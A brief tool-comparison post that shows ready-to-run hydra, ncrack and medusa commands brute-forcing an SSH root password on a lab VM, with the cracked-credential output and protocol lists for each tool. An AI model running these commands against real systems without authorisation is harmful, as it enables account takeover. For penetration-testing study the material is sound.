Brute force passwords with ncrack, hydra, and medusa

# hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh

[22][ssh] host: 10.10.10.10 login: root password: toor
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)

 

# ncrack -p 22 –user root -P 500-worst-passwords.txt 10.10.10.10

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: ‘root’ ‘toor’

 

# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh

ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]

Problems with VM?

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

medusaReceive returned no data

The answer is to use ncrack

 

Protocols supported include:

Hydra – TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA

Medusa – AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper,
Web Form

Ncrack – RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet

While ncrack has limited protocol support compared to Hydra and Medusa the only conclusion for this little test; when it comes to speed, reliability and the ability to hit RDP services ncrack wins!!